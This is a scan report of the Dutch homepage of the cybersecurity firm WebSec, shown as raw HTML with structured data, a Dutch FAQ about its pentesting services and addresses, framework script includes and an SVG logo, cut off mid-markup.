https://websec.nl/

Scan ID:
34a700a6-8ea1-4319-a8c8-9aa2cb0c0f15Finished
Submitted URL:
https://websec.nl/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 15 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 0 found

Messages logged to the web console

HTML

The raw HTML body of the page

<!DOCTYPE html><html class="overflow-auto" lang="nl"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width"><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","url":"https://websec.nl","logo":"https://websec.nl/logo-small.svg"}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","name":"WebSec B.V.","url":"https://websec.nl","sameAs":["https://github.com/websecnl","https://www.linkedin.com/company/14826551/","https://twitter.com/websecnl","https://www.facebook.com/websecinternational","https://www.youtube.com/channel/UCdesD67XUshGeC_kdy0Z9-A"]}</script><title>Websec | Uw Cybersecurity Specialist</title><meta name="description" content="Geen dreiging is te groot of te klein voor ons. Bij WebSec zetten we geavanceerde cybersecurity-oplossingen in om uw onderneming te beschermen, klaar voor de uitdagingen van zowel vandaag als morgen. Laat WebSec u helpen."><link rel="alternate" hreflang="nl" href="https://websec.nl"><link rel="alternate" hreflang="en" href="https://websec.net"><meta property="og:title" content="Websec | Uw Cybersecurity Specialist"><meta property="og:description" content="Geen dreiging is te groot of te klein voor ons. Bij WebSec zetten we geavanceerde cybersecurity-oplossingen in om uw onderneming te beschermen, klaar voor de uitdagingen van zowel vandaag als morgen. Laat WebSec u helpen."><link rel="canonical" href="https://websec.nl"><meta name="robots" content="index,follow"><meta property="og:image" content="https://websec.net/opengraph/index.jpg"><meta property="og:image:alt" content="Websec secures your infrastructure in a cost effective manner."><meta property="og:image:width" content="2004"><meta property="og:image:height" content="1084"><link rel="preload" as="image" imagesrcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=16&amp;q=96 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=32&amp;q=96 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=48&amp;q=96 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=60&amp;q=96 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=64&amp;q=96 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=96&amp;q=96 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=120&amp;q=96 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=128&amp;q=96 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=220&amp;q=96 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=256&amp;q=96 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=360&amp;q=96 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=384&amp;q=96 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=425&amp;q=96 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=480&amp;q=96 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=640&amp;q=96 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=750&amp;q=96 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=828&amp;q=96 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1080&amp;q=96 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1111&amp;q=96 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1200&amp;q=96 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1400&amp;q=96 1400w" imagesizes="60px" fetchpriority="high"><link rel="preload" as="image" imagesrcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=16&amp;q=91 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=32&amp;q=91 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=48&amp;q=91 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=60&amp;q=91 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=64&amp;q=91 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=96&amp;q=91 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=120&amp;q=91 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=128&amp;q=91 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=220&amp;q=91 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=256&amp;q=91 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=360&amp;q=91 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=384&amp;q=91 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=425&amp;q=91 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=480&amp;q=91 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=640&amp;q=91 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=750&amp;q=91 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=828&amp;q=91 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1080&amp;q=91 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1111&amp;q=91 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1200&amp;q=91 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1400&amp;q=91 1400w" imagesizes="(max-width: 1900px) 1111px, 1400px" fetchpriority="high"><script type="application/ld+json">{"@context":"https://schema.org","@type":"FAQPage","mainEntity":[{"@type":"Question","name":"Wie is WebSec?","acceptedAnswer":{"@type":"Answer","text":"WebSec is een organisatie met een missie en visie die volledig gericht is op IT-beveiliging. WebSec is specialist op het gebied van offensieve beveiliging. WebSec heeft specialisten in dienst die zeer geavanceerd zijn op het gebied van penetratietesten, code review en beveiligingsbewustzijn."}},{"@type":"Question","name":"Wat doet WebSec?","acceptedAnswer":{"@type":"Answer","text":"WebSec heeft ethische hackers (ook wel IT-beveiligingsconsultants, penetratietesters of pentesters genoemd). We zetten deze collega&apos;s in bij klanten om fouten en beveiligingsproblemen in hun informatiesystemen, netwerken, applicaties en servers op te sporen, om zo hun beveiliging te optimaliseren. Deze professionals kennen de werkwijze en denkwijze van een hacker, deze kennis wordt gebruikt door onze beveiligingsexperts om een veilige IT-omgeving voor onze klanten te waarborgen."}},{"@type":"Question","name":"Waar is WebSec gevestigd?","acceptedAnswer":{"@type":"Answer","text":"&lt;p&gt;We zijn momenteel geregistreerd op Keurenplein 41, UNIT A6260, 1069 CD Amsterdam, Nederland.&lt;br&gt;Ons United States adres is 1021 E Lincolnway Suite #6400, Cheyenne, Wyoming 82001&lt;/p&gt;\n"}},{"@type":"Question","name":"Wanneer is WebSec opgericht?","acceptedAnswer":{"@type":"Answer","text":"De handelsnaam WebSec bestaat al vier jaar, eerder geregistreerd bij de Kamer van Koophandel onder de naam &apos;OS.SI Consulting B.V.&apos; Sinds 3 augustus 2020 is WebSec een onafhankelijk beveiligingsbedrijf geworden onder een moederbedrijf &apos;WebSec Holding B.V.&apos;"}},{"@type":"Question","name":"Waarom kiezen voor WebSec?","acceptedAnswer":{"@type":"Answer","text":"&lt;p&gt;Omdat WebSec flexibiliteit, diversiteit, transparantie, snelheid en professionaliteit kan bieden voor de beste kwaliteit tegen onverslaanbare tarieven.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Divers:&lt;/strong&gt; Wij zijn momenteel de enige IT-beveiligingsorganisatie in Nederland die een alles-in-één beveiligingsoplossing abonnement kan bieden, bijvoorbeeld: onze klanten met een beveiligingsabonnement kunnen in januari een beveiligingsbeoordeling (pentest) doen en in februari een phishing-campagne zonder extra kosten.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Flexibel:&lt;/strong&gt; Aangezien het minimale contract één jaar is, kunnen we deze professionele beveiligingsprojecten tegen een lagere prijs uitvoeren voor een vast bedrag per maand.&lt;br&gt;Ook als onze klanten met een beveiligingsabonnement niet zeker weten welke maandelijkse dienst ze nodig hebben, hebben ze de mogelijkheid om het aantal uren naar de volgende maand over te dragen, waardoor ruimte ontstaat voor grotere opdrachten.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Professioneel:&lt;/strong&gt; In tegenstelling tot onze concurrenten kunnen wij de hoogst mogelijke kwaliteit van werk bieden, zonder onze klanten te veel te belasten of onze kwaliteitsnormen in gevaar te brengen.&lt;br&gt;Daarom garanderen wij klanttevredenheid en de beveiliging &amp;amp; bescherming van de IT-omgevingen van onze klanten het hele jaar door tegen de nieuwste bekende en onbekende cyberdreigingen.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Wendbaar:&lt;/strong&gt; WebSec heeft geen wachttijden, WebSec kan een opdracht onmiddellijk starten na het bespreken van een startdatum en het ondertekenen van het benodigde juridische papierwerk.&lt;br&gt;Bij WebSec bestaan er geen wachttijden of extra kosten voor spoedbestellingen.&lt;br&gt;WebSec is 24/7 telefonisch bereikbaar voor onze klanten en we zijn klaar om in te grijpen in geval van beveiligingsincidenten, niet alleen binnen de EU maar bijna overal ter wereld.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Transparantie:&lt;/strong&gt; Bij WebSec vinden we communicatie met onze klanten erg belangrijk, we streven ernaar om altijd de meest professionele ervaring te bieden.&lt;br&gt;Op deze manier houden we altijd nauwlettend in de gaten hoe, wat en wanneer en houden we onze klanten op de hoogte van elk evenement.&lt;br&gt;Onze kernwaarden zijn Integriteit, Vertrouwelijkheid en Beschikbaarheid. Daarom blijven onze klanten nooit in het duister, maar staan ze altijd in onze schijnwerpers.&lt;/p&gt;\n"}}]}</script><meta name="next-head-count" content="19"><link rel="shortcut icon" href="/favicon.svg" type="image/svg"><link rel="preload" href="/_next/static/media/da6a09561d78cd2a-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust"><link rel="preload" href="/_next/static/css/1b72de87d2f6adba.css" as="style"><link rel="stylesheet" href="/_next/static/css/1b72de87d2f6adba.css" data-n-g=""><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-78c92fac7aa8fdd8.js"></script><script src="/_next/static/chunks/webpack-b6ba851a2038d2bc.js" defer=""></script><script src="/_next/static/chunks/framework-309c38bc4fccfb69.js" defer=""></script><script src="/_next/static/chunks/main-4d4b16dc7128ff8e.js" defer=""></script><script src="/_next/static/chunks/pages/_app-24ef7c201d593c90.js" defer=""></script><script src="/_next/static/chunks/f3f7f12f-7f9e586ba53212c4.js" defer=""></script><script src="/_next/static/chunks/05c9fc68-1d07a395e5f27c03.js" defer=""></script><script src="/_next/static/chunks/448715ac-9e4d3e413d6711e0.js" defer=""></script><script src="/_next/static/chunks/cb700956-ea9f6facab4d2e07.js" defer=""></script><script src="/_next/static/chunks/52361fab-4d14db054b511730.js" defer=""></script><script src="/_next/static/chunks/d5d1985e-534cb8b838b3601a.js" defer=""></script><script src="/_next/static/chunks/05e16065-b518761db7742a5b.js" defer=""></script><script src="/_next/static/chunks/02af123e-49cbcf058b579f54.js" defer=""></script><script src="/_next/static/chunks/6be71db5-7a8090d9d748b1c2.js" defer=""></script><script src="/_next/static/chunks/edcdd9d7-06089efa9fe0ab85.js" defer=""></script><script src="/_next/static/chunks/de120a98-9a3fe8ceb6a94edc.js" defer=""></script><script src="/_next/static/chunks/2a190bc7-2b14062600182546.js" defer=""></script><script src="/_next/static/chunks/dcb886fd-6b1434171c3979f9.js" defer=""></script><script src="/_next/static/chunks/8364-57e1d42a50cfec2f.js" defer=""></script><script src="/_next/static/chunks/8238-f5623c4a7753dcaf.js" defer=""></script><script src="/_next/static/chunks/3818-b8dd29b42ae5155e.js" defer=""></script><script src="/_next/static/chunks/9382-dc67fe6677e9a47a.js" defer=""></script><script src="/_next/static/chunks/1905-b4560c8dfcd6b47e.js" defer=""></script><script src="/_next/static/chunks/3855-0dd2f44d786a42ae.js" defer=""></script><script src="/_next/static/chunks/2654-f930abdcc67cf6f5.js" defer=""></script><script src="/_next/static/chunks/1591-8e483235d1f64f4e.js" defer=""></script><script src="/_next/static/chunks/pages/index-00297a424ba90fda.js" defer=""></script><script src="/_next/static/gOHPSKRJyHMWHYp1WTY-F/_buildManifest.js" defer=""></script><script src="/_next/static/gOHPSKRJyHMWHYp1WTY-F/_ssgManifest.js" defer=""></script><style id="__jsx-bc610b14ced8dbc7">video.jsx-bc610b14ced8dbc7::-webkit-media-controls-panel,video.jsx-bc610b14ced8dbc7::-webkit-media-controls-start-playback-button,video.jsx-bc610b14ced8dbc7::-webkit-media-controls,video.jsx-bc610b14ced8dbc7::-webkit-media-controls-enclosure,video.jsx-bc610b14ced8dbc7::-webkit-media-controls-container{display:none!important;visibility:hidden!important;opacity:0!important}</style></head><body class="w-full overflow-x-clip"><div id="__next"><div class="text-base-black relative z-0"><style>
                  :root { font-family: '__rubikFont_b4f9c9', '__rubikFont_Fallback_b4f9c9', Rubik, Poppins, Inter, Ubuntu, ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji }
                  .filepond--root { font-family: '__rubikFont_b4f9c9', '__rubikFont_Fallback_b4f9c9', Rubik, Poppins, Inter, Ubuntu, ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji }
               </style><div class="flex flex-col min-h-screen"><div data-critters-container="true" class="border-b sm:border-none text-base-black"><div class="relative flex h-[6.5rem] max-w-6xl items-center gap-2 px-5 pl-3 md:h-28 lg:mx-auto lg:gap-8"><div class="flex items-center justify-center rounded-full cursor-pointer lg:hidden w-11 h-11 hover:bg-gray-100"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" class="text-gray-500" height="24" width="24" xmlns="http://www.w3.org/2000/svg"><path d="M904 160H120c-4.4 0-8 3.6-8 8v64c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-64c0-4.4-3.6-8-8-8zm0 624H120c-4.4 0-8 3.6-8 8v64c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-64c0-4.4-3.6-8-8-8zm0-312H120c-4.4 0-8 3.6-8 8v64c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-64c0-4.4-3.6-8-8-8z"></path></svg></div><a aria-label="Go to home" class="relative mr-auto fxc w-24 fill-white font-[roboto] text-xl font-medium sm:w-28 md:w-32 lg:w-40" href="https://websec.nl/"><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 170 44" class="w-full"><path fill="#0E041D" d="M78.48 9.2a.51.51 0 0 0-.5.43 393 393 0 0 1-1.77 9.23c-.33 1.58-.67 3.11-1.02 4.6-.34 1.47-.68 2.84-1.03 4.08 0 0-2.36-7.4-4.92-16.9a.52.52 0 0 0-.5-.38h-2.73a.52.52 0 0 0-.5.39c-2.55 9.5-4.92 16.9-4.92 16.9-.34-1.26-.69-2.62-1.03-4.1a228 228 0 0 1-1.98-9.43c-.28-1.5-.55-2.96-.8-4.4a.52.52 0 0 0-.51-.42h-3.6a.52.52 0 0 0-.5.39.5.5 0 0 0 0 .22c.77 4.13 1.62 8.1 2.55 11.93.94 3.88 2 7.6 3.2 11.14a.52.52 0 0 0 .48.35h3.66a.51.51 0 0 0 .49-.35 586 586 0 0 0 4.83-14.95c.81 2.68 3.8 12.09 4.83 14.95a.52.52 0 0 0 .48.35h3.66a.51.51 0 0 0 .49-.35c1.19-3.55 2.26-7.27 3.2-11.15Q81.42 16 82.59 9.82a.52.52 0 0 0-.51-.62zm4.24 15.05c0-1.6.23-3 .7-4.2.48-1.2 1.1-2.2 1.88-3a7.8 7.8 0 0 1 2.69-1.8c.98-.4 2.03-.6 3.1-.6 2.48 0 4.41.76 5.8 2.31s2.08 3.86 2.08 6.94c0 .23 0 .5-.02.78l-.01.3a.52.52 0 0 1-.52.48h-11.4a4.8 4.8 0 0 0 1.54 3.38c.9.8 2.22 1.2 3.94 1.2a12.9 12.9 0 0 0 4.17-.65.51.51 0 0 1 .6.2c.04.07.07.14.08.21l.38 2.41a.52.52 0 0 1-.32.57l-.56.2a18.6 18.6 0 0 1-4.87.71c-1.59 0-2.96-.24-4.13-.72a7.68 7.68 0 0 1-4.58-4.96 12.2 12.2 0 0 1-.55-3.76m12.09-1.88c0-.55-.08-1.11-.25-1.64-.14-.5-.38-.95-.7-1.36a3.34 3.34 0 0 0-2.73-1.22 3.7 3.7 0 0 0-2.92 1.3c-.34.4-.6.87-.77 1.36a7.3 7.3 0 0 0-.38 1.56zm23.02 1.81c0 1.46-.22 2.77-.64 3.94a8.5 8.5 0 0 1-1.83 3c-.8.84-1.78 1.49-2.87 1.9-1.13.44-2.4.66-3.82.66-1.33 0-2.64-.1-3.95-.3-.92-.16-1.83-.35-2.73-.6a.52.52 0 0 1-.38-.5V8.23a.52.52 0 0 1 .43-.52l3.13-.52a.51.51 0 0 1 .6.52v8.02a10 10 0 0 1 1.78-.7 8.1 8.1 0 0 1 2.32-.31c1.26 0 2.4.23 3.4.68.97.43 1.82 1.09 2.5 1.92.69.9 1.2 1.91 1.52 3 .37 1.26.55 2.56.54 3.87Zm-4.27-.07c0-1.78-.35-3.2-1.05-4.23q-1.05-1.56-3.33-1.56c-1.2 0-2.39.35-3.4 1v10.44a14 14 0 0 0 2.86.28c1.53 0 2.73-.53 3.6-1.58q1.32-1.575 1.32-4.35"></path><path fill="#E52949" d="M39.9 22.82 29.84 36.5l-3.97-5.39-2.87-3.9-7.1-9.65a11.06 11.06 0 0 1-2.12-6.5v-6.4h18.44v6.4c0 2.34-.75 4.62-2.13 6.5l-5.19 7.05a.88.88 0 0 0 0 1.05l2.12 2.87a.48.48 0 0 0 .6.14.5.5 0 0 0 .16-.14l6.03-8.2a15.76 15.76 0 0 0 3.04-9.27V.54A.55.55 0 0 0 36.3 0H9.7a.54.54 0 0 0-.54.54v10.52c0 3.34 1.07 6.59 3.04 9.27l7.93 10.78-3.97 5.39L6.1 22.82a2.73 2.73 0 0 0-2.18-1.1H.48a.47.47 0 0 0-.42.26.48.48 0 0 0 .03.5L15.78 43.8a.48.48 0 0 0 .6.14.5.5 0 0 0 .16-.14l4.94-6.71.75-1.04.76-1.03 6.46 8.78a.48.48 0 0 0 .6.14.5.5 0 0 0 .17-.14L45.9 22.48a.48.48 0 0 0-.38-.76h-3.44a2.7 2.7 0 0 0-2.18 1.1"></path><path fill="#0E041D" d="M126.36 29.97c1.56 0 2.7-.27 3.41-.8a2.64 2.64 0 0 0 1.07-2.25 2.9 2.9 0 0 0-.37-1.5 3.8 3.8 0 0 0-1.03-1.12 8.6 8.6 0 0 0-1.63-.94c-.65-.29-1.38-.57-2.2-.85q-1.245-.45-2.4-.99a8 8 0 0 1-2.03-1.33 6.1 6.1 0 0 1-1.42-1.9 6.1 6.1 0 0 1-.53-2.67c0-2.18.75-3.88 2.24-5.12 1.5-1.24 3.53-1.86 6.1-1.85a14.3 14.3 0 0 1 6.3 1.37.52.52 0 0 1 .25.66l-.97 2.56a.52.52 0 0 1-.29.3.5.5 0 0 1-.4 0c-.67-.33-1.37-.58-2.09-.76a12 12 0 0 0-2.87-.35c-1.17 0-2.08.25-2.74.73a2.4 2.4 0 0 0-.98 2.05c-.02.48.1.95.32 1.37.24.4.56.75.93 1.02.45.33.92.6 1.42.84.53.25 1.13.5 1.77.72 1.12.42 2.13.84 3.01 1.27.83.38 1.58.9 2.24 1.52.6.59 1.09 1.3 1.4 2.07.32.8.48 1.77.48 2.9 0 2.18-.76 3.86-2.29 5.05-1.52 1.18-3.76 1.78-6.7 1.78a17.7 17.7 0 0 1-4.87-.66 14.5 14.5 0 0 1-2.33-.89.52.52 0 0 1-.26-.64l.93-2.6a.5.5 0 0 1 .29-.3.5.5 0 0 1 .42.01 12.2 12.2 0 0 0 5.82 1.3m11.21-5.72c0-1.6.24-3 .7-4.2.48-1.2 1.1-2.2 1.89-3a7.8 7.8 0 0 1 2.68-1.8c.99-.4 2.04-.6 3.1-.6 2.48 0 4.41.77 5.8 2.31 1.4 1.55 2.09 3.87 2.09 6.94 0 .23 0 .5-.02.78 0 .1 0 .2-.02.3a.51.51 0 0 1-.5.48h-11.42a4.8 4.8 0 0 0 1.54 3.39c.9.8 2.22 1.2 3.94 1.2a12.9 12.9 0 0 0 4.2-.66.5.5 0 0 1 .58.2c.04.07.06.14.08.21l.38 2.41a.52.52 0 0 1-.32.57 10 10 0 0 1-1.94.54 20 20 0 0 1-3.5.37c-1.58 0-2.96-.24-4.13-.71a7.69 7.69 0 0 1-4.58-4.97 12.3 12.3 0 0 1-.55-3.76m12.1-1.87a5.6 5.6 0 0 0-.25-1.65 4 4 0 0 0-.7-1.35 3.35 3.35 0 0 0-2.75-1.23 3.7 3.7 0 0 0-2.9 1.31c-.35.4-.6.86-.78 1.35-.19.5-.31 1.03-.38 1.56h7.75Zm6.37 1.8c0-1.28.2-2.55.62-3.76a9 9 0 0 1 1.78-3.04 8.1 8.1 0 0 1 2.8-2.01 9.1 9.1 0 0 1 3.73-.73c1.5 0 2.98.25 4.39.77.11.04.21.13.27.25.06.11.07.24.04.37l-.63 2.42a.52.52 0 0 1-.46.39.5.5 0 0 1-.2-.03 8.8 8.8 0 0 0-3.06-.53c-1.64 0-2.88.52-3.73 1.55-.84 1.03-1.27 2.48-1.27 4.35q0 2.7 1.2 4.29c.8 1.05 2.16 1.57 4.07 1.57a10.6 10.6 0 0 0 3.32-.52.5.5 0 0 1 .59.2.5.5 0 0 1 .08.2l.42 2.46a.52.52 0 0 1-.32.57 14.7 14.7 0 0 1-4.57.73c-1.54 0-2.88-.23-4.02-.7a7.6 7.6 0 0 1-4.5-5 12.6 12.6 0 0 1-.55-3.8"></path></svg></a><nav class="z-10 mx-auto hidden h-[55%] items-center text-sm lg:flex xl:text-base"><a class="fxc hover:text-sig-red focus:text-sig-red h-full cursor-pointer gap-2 p-2.5 px-5 uppercase text-15" href="https://websec.nl/">Home</a><div class="fxc group h-full" tabindex="0"><div class="fxc group-hover:text-sig-red group-focus:text-sig-red text-15 cursor-pointer gap-2 p-2.5 px-3 uppercase"><div>Diensten</div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="M256 294.1L383 167c9.4-9.4 24.6-9.4 33.9 0s9.3 24.6 0 34L273 345c-9.1 9.1-23.7 9.3-33.1.7L95 201.1c-4.7-4.7-7-10.9-7-17s2.3-12.3 7-17c9.4-9.4 24.6-9.4 33.9 0l127.1 127z"></path></svg></div></div><div class="fxc group h-full" tabindex="0"><div class="fxc group-hover:text-sig-red group-focus:text-sig-red text-15 cursor-pointer gap-2 p-2.5 px-3 uppercase"><div>Bedrijf</div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="M256 294.1L383 167c9.4-9.4 24.6-9.4 33.9 0s9.3 24.6 0 34L273 345c-9.1 9.1-23.7 9.3-33.1.7L95 201.1c-4.7-4.7-7-10.9-7-17s2.3-12.3 7-17c9.4-9.4 24.6-9.4 33.9 0l127.1 127z"></path></svg></div></div><div class="fxc group h-full" tabindex="0"><div class="fxc group-hover:text-sig-red group-focus:text-sig-red text-15 cursor-pointer gap-2 p-2.5 px-3 uppercase"><div>Resources</div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="M256 294.1L383 167c9.4-9.4 24.6-9.4 33.9 0s9.3 24.6 0 34L273 345c-9.1 9.1-23.7 9.3-33.1.7L95 201.1c-4.7-4.7-7-10.9-7-17s2.3-12.3 7-17c9.4-9.4 24.6-9.4 33.9 0l127.1 127z"></path></svg></div></div></nav><div class="relative flex cursor-pointer group select-none items-center rounded-lg text-sm leading-snug h-10 xs:mx-5 lg:mx-0"><div class="absolute bottom-1 h-[2px] w-4 group-hover:w-5 rounded-full duration-200 -translate-x-1/2 left-1/4 group-hover:left-[30%] bg-dark-lave"></div><div class="fxc z-10 w-12 duration-150 sm:w-14 text-base-black font-medium">Dutch</div><div class="h-2.5 w-[1px] bg-gray-400/80 rotate-12 origin-center mx-1 fxc duration-200 delay-200"><svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-loader-circle shrink-0 text-gray-500 duration-200 -ml-[2px] opacity-0"><path d="M21 12a9 9 0 1 1-6.219-8.56"></path></svg></div><div class="fxc z-10 w-12 duration-150 sm:w-14 text-gray-600 group-hover:text-base-black">English</div></div><button type="button" aria-haspopup="dialog" aria-expanded="false" aria-controls="radix-:R2m6:" data-state="closed" class="min-w-fit rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-5 h-10 text-sig-red bg-none hover:bg-sig-red/10 shadow-lavender-mid/15 border font-[480] max-sm:hidden">24/7 Incidentrespons</button><button type="button" aria-haspopup="dialog" aria-expanded="false" aria-controls="radix-:R2m6:" data-state="closed" class="border-sig-red text-sig-red fxc focus:bg-sig-red mx-0.5 ml-3 h-8 w-8 cursor-pointer rounded-full border-[2px] focus:text-white sm:hidden shrink-0"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" class="rotate-90" height="18" width="18" xmlns="http://www.w3.org/2000/svg"><path d="M885.6 230.2L779.1 123.8a80.83 80.83 0 0 0-57.3-23.8c-21.7 0-42.1 8.5-57.4 23.8L549.8 238.4a80.83 80.83 0 0 0-23.8 57.3c0 21.7 8.5 42.1 23.8 57.4l83.8 83.8A393.82 393.82 0 0 1 553.1 553 395.34 395.34 0 0 1 437 633.8L353.2 550a80.83 80.83 0 0 0-57.3-23.8c-21.7 0-42.1 8.5-57.4 23.8L123.8 664.5a80.89 80.89 0 0 0-23.8 57.4c0 21.7 8.5 42.1 23.8 57.4l106.3 106.3c24.4 24.5 58.1 38.4 92.7 38.4 7.3 0 14.3-.6 21.2-1.8 134.8-22.2 268.5-93.9 376.4-201.7C828.2 612.8 899.8 479.2 922.3 344c6.8-41.3-6.9-83.8-36.7-113.8z"></path></svg></button></div></div><main class="text-base-black grow"><section data-critters-container="true" class="jsx-bc610b14ced8dbc7 my-9 mx-5 flex flex-col gap-y-6 text-center lg:hidden"><h1 class="jsx-bc610b14ced8dbc7 fxc xs:text-4xl flex-col text-[2.1rem] font-bold leading-[1.15] md:text-5xl md:leading-[1.15]"><img alt="" fetchpriority="high" decoding="async" data-nimg="fill" class="object-contain !relative max-w-[30px]" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="60px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=16&amp;q=96 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=32&amp;q=96 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=48&amp;q=96 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=60&amp;q=96 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=64&amp;q=96 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=96&amp;q=96 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=120&amp;q=96 120w, 